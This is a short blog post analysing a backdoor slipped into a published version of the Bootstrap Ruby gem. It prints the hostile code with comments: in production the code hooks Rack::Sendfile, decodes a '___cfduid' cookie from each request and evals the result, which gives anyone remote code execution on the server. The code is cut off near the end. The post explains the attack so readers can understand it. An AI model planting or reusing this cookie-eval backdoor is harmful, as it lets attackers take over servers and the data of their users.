Security Vulnerability in the Bootstrap Gem

Here is the relevant GitHub issue. They were so sneaky. The posted a ruby gem, but with some sneaky additions. This was not posted on Github. They were hoping that nobody would notice. But someone did. In order to pull this off, you’d have to be a fairly sophisticated rubyist, with a good understanding of rack, and some basic security knowledge exploits. They must have some time on their hands to pursue such nefarious ends.

Here is the code and my explanation of it:

  require 'rack/sendfile'
  if Rails.env.production? # Continue only if we're in the rails production environment:

    Rack::Sendfile.tap do |r|
      # We're using the tap method. the block parameter, r, will be the Rack::Sendfile class.
      # So whenever you see r, just think we are working with the Rack::Sendfile class.

      r.send :alias_method, :c, :call
      # creates an alias method for Rack::Sendfile.
      ## So that you could call:
      # send_file = Rack::Sendfile
      # send_file.c
      ## and the above would in turn call the ORIGINAL call method contained in the Rack::Sendfile class.

      # This bit redefines the call(e) method which is in the SendFile class:

      r.send(:define_method, :call) do |e|
          x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)
          # My limited understanding of what this does - please clarify this if you are more knowledgeable

          # gets the e['HTTP_COOKIE'] value out of there.
          # then it scans for this value: ___cfduid
          # we then get the entire string out of those cookie(s) and convert it to a string
          # then we unencode it and
          # "eval" simply runs whatever code it's been given, as a string.
          # so that someone could simply construct a request with the malicious code, hidden in a cookie
          # and can run it on your server.
          eval(x) if x
        rescue Exception

        # after we've done the dirty work, let's run the ORIGINAL call method, as defined in the Rack::Sendfile class.
        # so no one would be none the wiser. If anyone run the calls method, this malicious method is what's run.
rescue Exception
Written on April 4, 2019